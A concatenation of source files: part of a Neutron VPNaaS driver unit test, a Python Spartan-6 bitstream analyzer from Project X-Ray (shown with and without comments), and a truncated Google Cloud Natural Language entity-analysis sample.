'description': "my-vpn-connection",
'peer_address': '192.168.1.10',
'peer_id': '192.168.1.10',
'peer_cidrs': ['192.168.2.0/24', '192.168.3.0/24'],
'initiator': 'bi-directional',
'mtu': 1500,
'dpd_action': 'hold',
'dpd_interval': 40,
'dpd_timeout': 120,
'tenant_id': self._tenant_id,
'psk': 'abcd',
'status': 'PENDING_CREATE',
'admin_state_up': True}
with self.ikepolicy(name=ikename) as ikepolicy:
with self.ipsecpolicy(name=ipsecname) as ipsecpolicy:
with self.subnet() as subnet:
with self.router() as router:
plugin = manager.NeutronManager.get_plugin()
agent = {'host': FAKE_HOST,
'agent_type': constants.AGENT_TYPE_L3,
'binary': 'fake-binary',
'topic': 'fake-topic'}
plugin.create_or_update_agent(self.adminContext, agent)
plugin.schedule_router(
self.adminContext, router['router']['id'])
with self.vpnservice(name=vpnservice_name,
subnet=subnet,
router=router) as vpnservice1:
keys['ikepolicy_id'] = ikepolicy['ikepolicy']['id']
keys['ipsecpolicy_id'] = (
ipsecpolicy['ipsecpolicy']['id']
)
keys['vpnservice_id'] = (
vpnservice1['vpnservice']['id']
)
with self.ipsec_site_connection(
self.fmt,
ipsec_site_connection_name,
keys['peer_address'],
keys['peer_id'],
keys['peer_cidrs'],
keys['mtu'],
keys['psk'],
keys['initiator'],
keys['dpd_action'],
keys['dpd_interval'],
keys['dpd_timeout'],
vpnservice1,
ikepolicy,
ipsecpolicy,
keys['admin_state_up'],
description=description,
):
yield vpnservice1['vpnservice']
def test_get_agent_hosting_vpn_services(self):
with self.vpnservice_set():
service_plugin = manager.NeutronManager.get_service_plugins()[
p_constants.VPN]
vpnservices = service_plugin._get_agent_hosting_vpn_services(
self.adminContext, FAKE_HOST)
vpnservices = vpnservices.all()
self.assertEqual(1, len(vpnservices))
vpnservice_db = vpnservices[0]
self.assertEqual(1, len(vpnservice_db.ipsec_site_connections))
ipsec_site_connection = vpnservice_db.ipsec_site_connections[0]
self.assertIsNotNone(
ipsec_site_connection['ikepolicy'])
self.assertIsNotNone(
ipsec_site_connection['ipsecpolicy'])
def test_update_status(self):
with self.vpnservice_set() as vpnservice:
self._register_agent_states()
service_plugin = manager.NeutronManager.get_service_plugins()[
p_constants.VPN]
service_plugin.update_status_by_agent(
self.adminContext,
[{'status': 'ACTIVE',
'ipsec_site_connections': {},
'updated_pending_status': True,
'id': vpnservice['id']}])
vpnservices = service_plugin._get_agent_hosting_vpn_services(
self.adminContext, FAKE_HOST)
vpnservice_db = vpnservices[0]
self.assertEqual(p_constants.ACTIVE, vpnservice_db['status'])
| 45.950617
| 79
| 0.569183
|
import contextlib
import mock
from neutron.common import constants
from neutron import context
from neutron import manager
from neutron.plugins.common import constants as p_constants
from neutron.tests.unit.db.vpn import test_db_vpnaas
from neutron.tests.unit.openvswitch import test_agent_scheduler
from neutron.tests.unit import test_agent_ext_plugin
from neutron_vpnaas.db.vpn import vpn_validator
from neutron_vpnaas.services.vpn.service_drivers import ipsec as ipsec_driver
FAKE_HOST = test_agent_ext_plugin.L3_HOSTA
VPN_DRIVER_CLASS = 'neutron.services.vpn.plugin.VPNDriverPlugin'
class TestVPNDriverPlugin(test_db_vpnaas.TestVpnaas,
test_agent_scheduler.AgentSchedulerTestMixIn,
test_agent_ext_plugin.AgentDBTestMixIn):
def setUp(self):
self.adminContext = context.get_admin_context()
driver_cls_p = mock.patch(
'neutron.services.vpn.'
'service_drivers.ipsec.IPsecVPNDriver')
driver_cls = driver_cls_p.start()
self.driver = mock.Mock()
self.driver.service_type = ipsec_driver.IPSEC
self.driver.validator = vpn_validator.VpnReferenceValidator()
driver_cls.return_value = self.driver
super(TestVPNDriverPlugin, self).setUp(
vpnaas_plugin=VPN_DRIVER_CLASS)
def test_create_ipsec_site_connection(self, **extras):
super(TestVPNDriverPlugin, self).test_create_ipsec_site_connection()
self.driver.create_ipsec_site_connection.assert_called_once_with(
mock.ANY, mock.ANY)
self.driver.delete_ipsec_site_connection.assert_called_once_with(
mock.ANY, mock.ANY)
def test_delete_vpnservice(self, **extras):
super(TestVPNDriverPlugin, self).test_delete_vpnservice()
self.driver.delete_vpnservice.assert_called_once_with(
mock.ANY, mock.ANY)
def test_update_vpnservice(self, **extras):
super(TestVPNDriverPlugin, self).test_update_vpnservice()
self.driver.update_vpnservice.assert_called_once_with(
mock.ANY, mock.ANY, mock.ANY)
@contextlib.contextmanager
def vpnservice_set(self):
vpnservice_name = "vpn1"
ipsec_site_connection_name = "ipsec_site_connection"
ikename = "ikepolicy1"
ipsecname = "ipsecpolicy1"
description = "my-vpn-connection"
keys = {'name': vpnservice_name,
'description': "my-vpn-connection",
'peer_address': '192.168.1.10',
'peer_id': '192.168.1.10',
'peer_cidrs': ['192.168.2.0/24', '192.168.3.0/24'],
'initiator': 'bi-directional',
'mtu': 1500,
'dpd_action': 'hold',
'dpd_interval': 40,
'dpd_timeout': 120,
'tenant_id': self._tenant_id,
'psk': 'abcd',
'status': 'PENDING_CREATE',
'admin_state_up': True}
with self.ikepolicy(name=ikename) as ikepolicy:
with self.ipsecpolicy(name=ipsecname) as ipsecpolicy:
with self.subnet() as subnet:
with self.router() as router:
plugin = manager.NeutronManager.get_plugin()
agent = {'host': FAKE_HOST,
'agent_type': constants.AGENT_TYPE_L3,
'binary': 'fake-binary',
'topic': 'fake-topic'}
plugin.create_or_update_agent(self.adminContext, agent)
plugin.schedule_router(
self.adminContext, router['router']['id'])
with self.vpnservice(name=vpnservice_name,
subnet=subnet,
router=router) as vpnservice1:
keys['ikepolicy_id'] = ikepolicy['ikepolicy']['id']
keys['ipsecpolicy_id'] = (
ipsecpolicy['ipsecpolicy']['id']
)
keys['vpnservice_id'] = (
vpnservice1['vpnservice']['id']
)
with self.ipsec_site_connection(
self.fmt,
ipsec_site_connection_name,
keys['peer_address'],
keys['peer_id'],
keys['peer_cidrs'],
keys['mtu'],
keys['psk'],
keys['initiator'],
keys['dpd_action'],
keys['dpd_interval'],
keys['dpd_timeout'],
vpnservice1,
ikepolicy,
ipsecpolicy,
keys['admin_state_up'],
description=description,
):
yield vpnservice1['vpnservice']
def test_get_agent_hosting_vpn_services(self):
with self.vpnservice_set():
service_plugin = manager.NeutronManager.get_service_plugins()[
p_constants.VPN]
vpnservices = service_plugin._get_agent_hosting_vpn_services(
self.adminContext, FAKE_HOST)
vpnservices = vpnservices.all()
self.assertEqual(1, len(vpnservices))
vpnservice_db = vpnservices[0]
self.assertEqual(1, len(vpnservice_db.ipsec_site_connections))
ipsec_site_connection = vpnservice_db.ipsec_site_connections[0]
self.assertIsNotNone(
ipsec_site_connection['ikepolicy'])
self.assertIsNotNone(
ipsec_site_connection['ipsecpolicy'])
def test_update_status(self):
with self.vpnservice_set() as vpnservice:
self._register_agent_states()
service_plugin = manager.NeutronManager.get_service_plugins()[
p_constants.VPN]
service_plugin.update_status_by_agent(
self.adminContext,
[{'status': 'ACTIVE',
'ipsec_site_connections': {},
'updated_pending_status': True,
'id': vpnservice['id']}])
vpnservices = service_plugin._get_agent_hosting_vpn_services(
self.adminContext, FAKE_HOST)
vpnservice_db = vpnservices[0]
self.assertEqual(p_constants.ACTIVE, vpnservice_db['status'])
| true
| true
|
f70b65d7b3654b248db969d72b0a41b9332d19db
| 14,122
|
py
|
Python
|
utils/sp6_bitstream_analyzer.py
|
rw1nkler/prjxray
|
aff076b47dcf6d653eb3ce791b41fd6cf4343edd
|
[
"ISC"
] | 583
|
2017-12-21T11:06:13.000Z
|
2022-02-20T21:27:33.000Z
|
utils/sp6_bitstream_analyzer.py
|
rw1nkler/prjxray
|
aff076b47dcf6d653eb3ce791b41fd6cf4343edd
|
[
"ISC"
] | 1,212
|
2017-12-22T15:05:06.000Z
|
2022-02-19T13:04:59.000Z
|
utils/sp6_bitstream_analyzer.py
|
mfkiwl/prjxray-xilinx-7-bitstream-fortmat
|
5349556bc2c230801d6df0cf11bccb9cfd171639
|
[
"ISC"
] | 134
|
2017-12-21T10:16:50.000Z
|
2022-02-16T06:42:04.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017-2020 The Project X-Ray Authors.
#
# Use of this source code is governed by a ISC-style
# license that can be found in the LICENSE file or at
# https://opensource.org/licenses/ISC
#
# SPDX-License-Identifier: ISC
'''
Spartan 6 bitstream analyzer tool.
This script reads a Spartan6 bitstream and prints out some useful information.
It can also create a frames file with the configuration data words.
The bitstream is analyzed word by word and interpreted according to
the UG380 Configuration User Guide.
The tool can be used to derive the initialization, startup and finalization
sequence as well as the configuration data. The latter is written to a frames
file which can be used by the bitstream tools such as frames2bit to generate
a valid bitstream.
'''
import argparse
from io import StringIO
conf_regs = {
0: "CRC",
1: "FAR_MAJ",
2: "FAR_MIN",
3: "FDRI",
4: "FDRO",
5: "CMD",
6: "CTL",
7: "MASK",
8: "STAT",
9: "LOUT",
10: "COR1",
11: "COR2",
12: "PWRDN_REG",
13: "FLR",
14: "IDCODE",
15: "CWDT",
16: "HC_OPT_REG",
18: "CSBO",
19: "GENERAL1",
20: "GENERAL2",
21: "GENERAL3",
22: "GENERAL4",
23: "GENERAL5",
24: "MODE_REG",
25: "PU_GWE",
26: "PU_GTS",
27: "MFWR",
28: "CCLK_FREQ",
29: "SEU_OPT",
30: "EXP_SIGN",
31: "RDBK_SIGN",
32: "BOOTSTS",
33: "EYE_MASK",
34: "CBC_REG"
}
cmd_reg_codes = {
0: "NULL",
1: "WCFG",
2: "MFW",
3: "LFRM",
4: "RCFG",
5: "START",
7: "RCRC",
8: "AGHIGH",
10: "GRESTORE",
11: "SHUTDOWN",
13: "DESYNC",
14: "IPROG"
}
opcodes = ("NOP", "READ", "WRITE", "UNKNOWN")
def KnuthMorrisPratt(text, pattern):
'''
Yields all starting positions of copies of the pattern in the text.
Calling conventions are similar to string.find, but its arguments can be
lists or iterators, not just strings, it returns all matches, not just
the first one, and it does not need the whole text in memory at once.
Whenever it yields, it will have read the text exactly up to and including
the match that caused the yield.
'''
# allow indexing into pattern and protect against change during yield
pattern = list(pattern)
# build table of shift amounts
shifts = [1] * (len(pattern) + 1)
shift = 1
for pos in range(len(pattern)):
while shift <= pos and pattern[pos] != pattern[pos - shift]:
shift += shifts[pos - shift]
shifts[pos + 1] = shift
# do the actual search
startPos = 0
matchLen = 0
for c in text:
while matchLen == len(pattern) or \
matchLen >= 0 and pattern[matchLen] != c:
startPos += shifts[matchLen]
matchLen -= shifts[matchLen]
matchLen += 1
if matchLen == len(pattern):
yield startPos
class Bitstream:
def __init__(self, file_name, verbose=False):
self.frame_data = []
self.idcode = 0
self.exp_sign = 0
self.far_min = 0
self.far_maj = 0
self.curr_fdri_write_len = 0
self.curr_crc_check = 0
self.fdri_in_progress = False
with open(file_name, "rb") as f:
self.bytes = f.read()
pos, self.header = self.get_header()
self.body = [
(i << 8) | j
for i, j in zip(self.bytes[pos::2], self.bytes[pos + 1::2])
]
self.parse_bitstream(verbose)
def get_header(self):
pos = next(KnuthMorrisPratt(self.bytes, [0xaa, 0x99, 0x55, 0x66]))
return pos + 4, self.bytes[:pos + 4]
def parse_bitstream(self, verbose):
payload_len = 0
for word in self.body:
if payload_len > 0:
if verbose:
print("\tWord: ", hex(word))
payload_len = self.parse_reg(
reg_addr, word, payload_len, verbose)
continue
else:
packet_header = self.parse_packet_header(word)
opcode = packet_header["opcode"]
reg_addr = packet_header["reg_addr"]
words = packet_header["word_count"]
type = packet_header["type"]
if verbose:
print(
"\tWord: ", hex(word),
'Type: {}, Op: {}, Addr: {}, Words: {}'.format(
type, opcodes[opcode], reg_addr, words))
if opcode and reg_addr in conf_regs:
payload_len = words
continue
def parse_packet_header(self, word):
type = (word >> 13) & 0x7
opcode = (word >> 11) & 0x3
reg_addr = (word >> 5) & 0x3F
if type == 1:
word_count = word & 0x1F
elif type == 2:
word_count = 2
else:
word_count = 0
return {
"type": type,
"opcode": opcode,
"reg_addr": reg_addr,
"word_count": word_count
}
def parse_command(self, word):
return cmd_reg_codes[word]
def parse_cor1(self, word):
return word
def parse_cor2(self, word):
return word
def parse_ctl(self, word):
#decryption
dec = (word >> 6) & 1
#security bits
sb = (word >> 4) & 3
#persist
p = (word >> 3) & 1
#use efuse
efuse = (word >> 2) & 1
#crc extstat disable
crc = (word >> 1) & 1
return {
"decryption": dec,
"security bits": sb,
"pesist": p,
"use efuse": efuse,
"crc extstat disable": crc
}
def parse_cclk_freq(self, word):
ext_mclk = (word >> 14) & 1
mclk_freq = word & 0x3FF
return (ext_mclk, mclk_freq)
def parse_pwrdn(self, word):
en_eyes = (word >> 14) & 1
filter_b = (word >> 5) & 1
en_pgsr = (word >> 4) & 1
en_pwrdn = (word >> 2) & 1
keep_sclk = word & 1
return {
"en_eyes": en_eyes,
"filter_b": filter_b,
"en_pgsr": en_pgsr,
"en_pwrdn": en_pwrdn,
"keep_sclk": keep_sclk
}
def parse_eye_mask(self, word):
return word & 0xFF
def parse_hc_opt(self, word):
return (word >> 6) & 1
def parse_cwdt(self, word):
return word
def parse_pu_gwe(self, word):
return word & 0x3FF
def parse_pu_gts(self, word):
return word & 0x3FF
def parse_mode(self, word):
new_mode = (word >> 13) & 0x1
buswidth = (word >> 11) & 0x3
bootmode = (word >> 8) & 0x7
bootvsel = word & 0xFF
return {
"new_mode": new_mode,
"buswidth": buswidth,
"bootmode": bootmode,
"bootvsel": bootvsel
}
def parse_seu(self, word):
seu_freq = (word >> 4) & 0x3FF
seu_run_on_err = (word >> 3) & 0x1
glut_mask = (word >> 1) & 0x1
seu_enable = word & 0x1
return {
"seu_freq": seu_freq,
"seu_run_on_err": seu_run_on_err,
"glut_mask": glut_mask,
"seu_enable": seu_enable
}
def parse_reg(self, reg_addr, word, payload_len, verbose):
reg = conf_regs[reg_addr]
if reg == "CMD":
command = self.parse_command(word)
if verbose:
print("Command: {}\n".format(command))
elif reg == "FLR":
frame_length = word
if verbose:
print("Frame length: {}\n".format(frame_length))
elif reg == "COR1":
conf_options = self.parse_cor1(word)
if verbose:
print("COR1 options: {}\n".format(conf_options))
elif reg == "COR2":
conf_options = self.parse_cor2(word)
if verbose:
print("COR2 options: {}\n".format(conf_options))
elif reg == "IDCODE":
assert payload_len < 3
if payload_len == 2:
self.idcode = word << 16
elif payload_len == 1:
self.idcode |= word
if verbose:
print("IDCODE: {}\n".format(hex(self.idcode)))
elif reg == "MASK":
mask = word
if verbose:
print("Mask value: {}\n".format(mask))
elif reg == "CTL":
ctl_options = self.parse_ctl(word)
if verbose:
print("CTL options: {}\n".format(ctl_options))
elif reg == "CCLK_FREQ":
cclk_freq_options = self.parse_cclk_freq(word)
if verbose:
print("CCLK_FREQ options: {}\n".format(cclk_freq_options))
elif reg == "PWRDN_REG":
suspend_reg_options = self.parse_pwrdn(word)
if verbose:
print("{} options: {}\n".format(reg, suspend_reg_options))
elif reg == "EYE_MASK":
eye_mask = self.parse_eye_mask(word)
if verbose:
print("{} options: {}\n".format(reg, eye_mask))
elif reg == "HC_OPT_REG":
hc_options = self.parse_hc_opt(word)
if verbose:
print("{} options: {}\n".format(reg, hc_options))
elif reg == "CWDT":
cwdt_options = self.parse_cwdt(word)
if verbose:
print("{} options: {}\n".format(reg, cwdt_options))
elif reg == "PU_GWE":
pu_gwe_sequence = self.parse_pu_gwe(word)
if verbose:
print("{} options: {}\n".format(reg, pu_gwe_sequence))
elif reg == "PU_GTS":
pu_gts_sequence = self.parse_pu_gts(word)
if verbose:
print("{} options: {}\n".format(reg, pu_gts_sequence))
elif reg == "MODE_REG":
mode_options = self.parse_mode(word)
if verbose:
print("{} options: {}\n".format(reg, mode_options))
elif reg == "GENERAL1" or reg == "GENERAL2" \
or reg == "GENERAL3" or reg == "GENERAL4" \
or reg == "GENERAL5":
general_options = word
if verbose:
print("{} options: {}\n".format(reg, general_options))
elif reg == "SEU_OPT":
seu_options = self.parse_seu(word)
if verbose:
print("{} options: {}\n".format(reg, seu_options))
elif reg == "EXP_SIGN":
if payload_len == 2:
self.exp_sign = word << 16
elif payload_len == 1:
self.exp_sign |= word
if verbose:
print("{}: {}\n".format(reg, self.exp_sign))
elif reg == "FAR_MAJ":
if payload_len == 2:
self.current_far_maj = word
elif payload_len == 1:
self.current_far_min = word
if verbose:
print(
"{}: {} FAR_MIN: {}\n".format(
reg, self.far_maj, self.far_min))
elif reg == "FDRI":
if self.fdri_in_progress:
self.frame_data.append(word)
if payload_len == 1:
self.fdri_in_progress = False
return 0
elif payload_len == 2:
self.curr_fdri_write_len = (word & 0xFFF) << 16
elif payload_len == 1:
self.curr_fdri_write_len |= word
self.fdri_in_progress = True
# Check if 0 words actually means read something
payload_len = self.curr_fdri_write_len + 2
if verbose:
print("{}: {}\n".format(reg, self.curr_fdri_write_len))
return payload_len
elif reg == "CRC":
if payload_len == 2:
self.curr_crc_check = (word & 0xFFF) << 16
elif payload_len == 1:
self.curr_crc_check |= word
if verbose:
print("{}: {}\n".format(reg, self.curr_crc_check))
payload_len -= 1
return payload_len
def write_frames_txt(self, file_name):
'''Write frame data in a more readable format'''
frame_stream = StringIO()
for i in range(len(self.frame_data)):
if i % 65 == 0:
frame_stream.write("\nFrame {:4}\n".format(i // 65))
#IOB word
if i % 65 == 32:
frame_stream.write(
"\n#{:3}:{:6}\n".format(i % 65, hex(self.frame_data[i])))
else:
frame_stream.write(
"#{:3}:{:6},".format(i % 65, hex(self.frame_data[i])))
with open(file_name, "w") as f:
print(frame_stream.getvalue(), file=f)
def write_frames(self, file_name):
'''Write configuration data to frames file'''
frame_stream = StringIO()
for i in range(len(self.frame_data)):
if i % 65 == 0:
frame_stream.write("0x{:08x} ".format(i // 65))
frame_stream.write("0x{:04x}".format(self.frame_data[i]))
if i % 65 == 64:
frame_stream.write("\n")
elif i < len(self.frame_data) - 1:
frame_stream.write(",")
with open(file_name, "w") as f:
print(frame_stream.getvalue(), file=f)
def main(args):
verbose = not args.silent
bitstream = Bitstream(args.bitstream, verbose)
print("Frame data length: ", len(bitstream.frame_data))
if args.frames_out:
bitstream.write_frames(args.frames_out)
if verbose:
bitstream.write_frames_txt(args.frames_out + ".txt")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--bitstream', help='Input bitstream')
parser.add_argument('--frames_out', help='Output frames file')
parser.add_argument(
'--silent', help="Don't print analysis details", action='store_true')
args = parser.parse_args()
main(args)
| 32.539171
| 78
| 0.522518
|
import argparse
from io import StringIO
conf_regs = {
0: "CRC",
1: "FAR_MAJ",
2: "FAR_MIN",
3: "FDRI",
4: "FDRO",
5: "CMD",
6: "CTL",
7: "MASK",
8: "STAT",
9: "LOUT",
10: "COR1",
11: "COR2",
12: "PWRDN_REG",
13: "FLR",
14: "IDCODE",
15: "CWDT",
16: "HC_OPT_REG",
18: "CSBO",
19: "GENERAL1",
20: "GENERAL2",
21: "GENERAL3",
22: "GENERAL4",
23: "GENERAL5",
24: "MODE_REG",
25: "PU_GWE",
26: "PU_GTS",
27: "MFWR",
28: "CCLK_FREQ",
29: "SEU_OPT",
30: "EXP_SIGN",
31: "RDBK_SIGN",
32: "BOOTSTS",
33: "EYE_MASK",
34: "CBC_REG"
}
cmd_reg_codes = {
0: "NULL",
1: "WCFG",
2: "MFW",
3: "LFRM",
4: "RCFG",
5: "START",
7: "RCRC",
8: "AGHIGH",
10: "GRESTORE",
11: "SHUTDOWN",
13: "DESYNC",
14: "IPROG"
}
opcodes = ("NOP", "READ", "WRITE", "UNKNOWN")
def KnuthMorrisPratt(text, pattern):
pattern = list(pattern)
shifts = [1] * (len(pattern) + 1)
shift = 1
for pos in range(len(pattern)):
while shift <= pos and pattern[pos] != pattern[pos - shift]:
shift += shifts[pos - shift]
shifts[pos + 1] = shift
startPos = 0
matchLen = 0
for c in text:
while matchLen == len(pattern) or \
matchLen >= 0 and pattern[matchLen] != c:
startPos += shifts[matchLen]
matchLen -= shifts[matchLen]
matchLen += 1
if matchLen == len(pattern):
yield startPos
class Bitstream:
def __init__(self, file_name, verbose=False):
self.frame_data = []
self.idcode = 0
self.exp_sign = 0
self.far_min = 0
self.far_maj = 0
self.curr_fdri_write_len = 0
self.curr_crc_check = 0
self.fdri_in_progress = False
with open(file_name, "rb") as f:
self.bytes = f.read()
pos, self.header = self.get_header()
self.body = [
(i << 8) | j
for i, j in zip(self.bytes[pos::2], self.bytes[pos + 1::2])
]
self.parse_bitstream(verbose)
def get_header(self):
pos = next(KnuthMorrisPratt(self.bytes, [0xaa, 0x99, 0x55, 0x66]))
return pos + 4, self.bytes[:pos + 4]
def parse_bitstream(self, verbose):
payload_len = 0
for word in self.body:
if payload_len > 0:
if verbose:
print("\tWord: ", hex(word))
payload_len = self.parse_reg(
reg_addr, word, payload_len, verbose)
continue
else:
packet_header = self.parse_packet_header(word)
opcode = packet_header["opcode"]
reg_addr = packet_header["reg_addr"]
words = packet_header["word_count"]
type = packet_header["type"]
if verbose:
print(
"\tWord: ", hex(word),
'Type: {}, Op: {}, Addr: {}, Words: {}'.format(
type, opcodes[opcode], reg_addr, words))
if opcode and reg_addr in conf_regs:
payload_len = words
continue
def parse_packet_header(self, word):
type = (word >> 13) & 0x7
opcode = (word >> 11) & 0x3
reg_addr = (word >> 5) & 0x3F
if type == 1:
word_count = word & 0x1F
elif type == 2:
word_count = 2
else:
word_count = 0
return {
"type": type,
"opcode": opcode,
"reg_addr": reg_addr,
"word_count": word_count
}
def parse_command(self, word):
return cmd_reg_codes[word]
def parse_cor1(self, word):
return word
def parse_cor2(self, word):
return word
def parse_ctl(self, word):
dec = (word >> 6) & 1
sb = (word >> 4) & 3
p = (word >> 3) & 1
efuse = (word >> 2) & 1
crc = (word >> 1) & 1
return {
"decryption": dec,
"security bits": sb,
"pesist": p,
"use efuse": efuse,
"crc extstat disable": crc
}
def parse_cclk_freq(self, word):
ext_mclk = (word >> 14) & 1
mclk_freq = word & 0x3FF
return (ext_mclk, mclk_freq)
def parse_pwrdn(self, word):
en_eyes = (word >> 14) & 1
filter_b = (word >> 5) & 1
en_pgsr = (word >> 4) & 1
en_pwrdn = (word >> 2) & 1
keep_sclk = word & 1
return {
"en_eyes": en_eyes,
"filter_b": filter_b,
"en_pgsr": en_pgsr,
"en_pwrdn": en_pwrdn,
"keep_sclk": keep_sclk
}
def parse_eye_mask(self, word):
return word & 0xFF
def parse_hc_opt(self, word):
return (word >> 6) & 1
def parse_cwdt(self, word):
return word
def parse_pu_gwe(self, word):
return word & 0x3FF
def parse_pu_gts(self, word):
return word & 0x3FF
def parse_mode(self, word):
new_mode = (word >> 13) & 0x1
buswidth = (word >> 11) & 0x3
bootmode = (word >> 8) & 0x7
bootvsel = word & 0xFF
return {
"new_mode": new_mode,
"buswidth": buswidth,
"bootmode": bootmode,
"bootvsel": bootvsel
}
def parse_seu(self, word):
seu_freq = (word >> 4) & 0x3FF
seu_run_on_err = (word >> 3) & 0x1
glut_mask = (word >> 1) & 0x1
seu_enable = word & 0x1
return {
"seu_freq": seu_freq,
"seu_run_on_err": seu_run_on_err,
"glut_mask": glut_mask,
"seu_enable": seu_enable
}
def parse_reg(self, reg_addr, word, payload_len, verbose):
reg = conf_regs[reg_addr]
if reg == "CMD":
command = self.parse_command(word)
if verbose:
print("Command: {}\n".format(command))
elif reg == "FLR":
frame_length = word
if verbose:
print("Frame length: {}\n".format(frame_length))
elif reg == "COR1":
conf_options = self.parse_cor1(word)
if verbose:
print("COR1 options: {}\n".format(conf_options))
elif reg == "COR2":
conf_options = self.parse_cor2(word)
if verbose:
print("COR2 options: {}\n".format(conf_options))
elif reg == "IDCODE":
assert payload_len < 3
if payload_len == 2:
self.idcode = word << 16
elif payload_len == 1:
self.idcode |= word
if verbose:
print("IDCODE: {}\n".format(hex(self.idcode)))
elif reg == "MASK":
mask = word
if verbose:
print("Mask value: {}\n".format(mask))
elif reg == "CTL":
ctl_options = self.parse_ctl(word)
if verbose:
print("CTL options: {}\n".format(ctl_options))
elif reg == "CCLK_FREQ":
cclk_freq_options = self.parse_cclk_freq(word)
if verbose:
print("CCLK_FREQ options: {}\n".format(cclk_freq_options))
elif reg == "PWRDN_REG":
suspend_reg_options = self.parse_pwrdn(word)
if verbose:
print("{} options: {}\n".format(reg, suspend_reg_options))
elif reg == "EYE_MASK":
eye_mask = self.parse_eye_mask(word)
if verbose:
print("{} options: {}\n".format(reg, eye_mask))
elif reg == "HC_OPT_REG":
hc_options = self.parse_hc_opt(word)
if verbose:
print("{} options: {}\n".format(reg, hc_options))
elif reg == "CWDT":
cwdt_options = self.parse_cwdt(word)
if verbose:
print("{} options: {}\n".format(reg, cwdt_options))
elif reg == "PU_GWE":
pu_gwe_sequence = self.parse_pu_gwe(word)
if verbose:
print("{} options: {}\n".format(reg, pu_gwe_sequence))
elif reg == "PU_GTS":
pu_gts_sequence = self.parse_pu_gts(word)
if verbose:
print("{} options: {}\n".format(reg, pu_gts_sequence))
elif reg == "MODE_REG":
mode_options = self.parse_mode(word)
if verbose:
print("{} options: {}\n".format(reg, mode_options))
elif reg == "GENERAL1" or reg == "GENERAL2" \
or reg == "GENERAL3" or reg == "GENERAL4" \
or reg == "GENERAL5":
general_options = word
if verbose:
print("{} options: {}\n".format(reg, general_options))
elif reg == "SEU_OPT":
seu_options = self.parse_seu(word)
if verbose:
print("{} options: {}\n".format(reg, seu_options))
elif reg == "EXP_SIGN":
if payload_len == 2:
self.exp_sign = word << 16
elif payload_len == 1:
self.exp_sign |= word
if verbose:
print("{}: {}\n".format(reg, self.exp_sign))
elif reg == "FAR_MAJ":
if payload_len == 2:
self.current_far_maj = word
elif payload_len == 1:
self.current_far_min = word
if verbose:
print(
"{}: {} FAR_MIN: {}\n".format(
reg, self.far_maj, self.far_min))
elif reg == "FDRI":
if self.fdri_in_progress:
self.frame_data.append(word)
if payload_len == 1:
self.fdri_in_progress = False
return 0
elif payload_len == 2:
self.curr_fdri_write_len = (word & 0xFFF) << 16
elif payload_len == 1:
self.curr_fdri_write_len |= word
self.fdri_in_progress = True
payload_len = self.curr_fdri_write_len + 2
if verbose:
print("{}: {}\n".format(reg, self.curr_fdri_write_len))
return payload_len
elif reg == "CRC":
if payload_len == 2:
self.curr_crc_check = (word & 0xFFF) << 16
elif payload_len == 1:
self.curr_crc_check |= word
if verbose:
print("{}: {}\n".format(reg, self.curr_crc_check))
payload_len -= 1
return payload_len
def write_frames_txt(self, file_name):
frame_stream = StringIO()
for i in range(len(self.frame_data)):
if i % 65 == 0:
frame_stream.write("\nFrame {:4}\n".format(i // 65))
if i % 65 == 32:
frame_stream.write(
"\n#{:3}:{:6}\n".format(i % 65, hex(self.frame_data[i])))
else:
frame_stream.write(
"#{:3}:{:6},".format(i % 65, hex(self.frame_data[i])))
with open(file_name, "w") as f:
print(frame_stream.getvalue(), file=f)
def write_frames(self, file_name):
frame_stream = StringIO()
for i in range(len(self.frame_data)):
if i % 65 == 0:
frame_stream.write("0x{:08x} ".format(i // 65))
frame_stream.write("0x{:04x}".format(self.frame_data[i]))
if i % 65 == 64:
frame_stream.write("\n")
elif i < len(self.frame_data) - 1:
frame_stream.write(",")
with open(file_name, "w") as f:
print(frame_stream.getvalue(), file=f)
def main(args):
verbose = not args.silent
bitstream = Bitstream(args.bitstream, verbose)
print("Frame data length: ", len(bitstream.frame_data))
if args.frames_out:
bitstream.write_frames(args.frames_out)
if verbose:
bitstream.write_frames_txt(args.frames_out + ".txt")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--bitstream', help='Input bitstream')
parser.add_argument('--frames_out', help='Output frames file')
parser.add_argument(
'--silent', help="Don't print analysis details", action='store_true')
args = parser.parse_args()
main(args)
| true
| true
|
f70b669356f7538feec576b7756d8e12924a4c88
| 2,257
|
py
|
Python
|
code-samples/language/v1/python/analyze_entities_request_language_entities_text.py
|
tswast/gapic-docs-samples
|
16976b148fb6eb53a8a685d475dcdb713ceb9e60
|
[
"Apache-2.0"
] | null | null | null |
code-samples/language/v1/python/analyze_entities_request_language_entities_text.py
|
tswast/gapic-docs-samples
|
16976b148fb6eb53a8a685d475dcdb713ceb9e60
|
[
"Apache-2.0"
] | null | null | null |
code-samples/language/v1/python/analyze_entities_request_language_entities_text.py
|
tswast/gapic-docs-samples
|
16976b148fb6eb53a8a685d475dcdb713ceb9e60
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# DO NOT EDIT! This is a generated sample ("Request", "language_entities_text")
# To install the latest published package dependency, execute the following:
# pip install google-cloud-language
import sys
# [START language_entities_text]
from google.cloud import language_v1
from google.cloud.language_v1 import enums
from google.cloud.language_v1 import enums
import six
def sample_analyze_entities(text_content):
"""Analyze entities in text"""
# [START language_entities_text_core]
client = language_v1.LanguageServiceClient()
# text_content = 'California is a state.'
if isinstance(text_content, six.binary_type):
text_content = text_content.decode('utf-8')
type_ = enums.Document.Type.PLAIN_TEXT
document = {'type': type_, 'content': text_content}
response = client.analyze_entities(document)
for entity in response.entities:
print('Entity name: {}'.format(entity.name))
print('Entity type: {}'.format(enums.Entity.Type(entity.type).name))
print('Entity salience score: {}'.format(entity.salience))
for mention in entity.mentions:
print('Mention: {}'.format(mention.text.content))
print('Mention type: {}'.format(
enums.EntityMention.Type(mention.type).name))
# [END language_entities_text_core]
# [END language_entities_text]
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
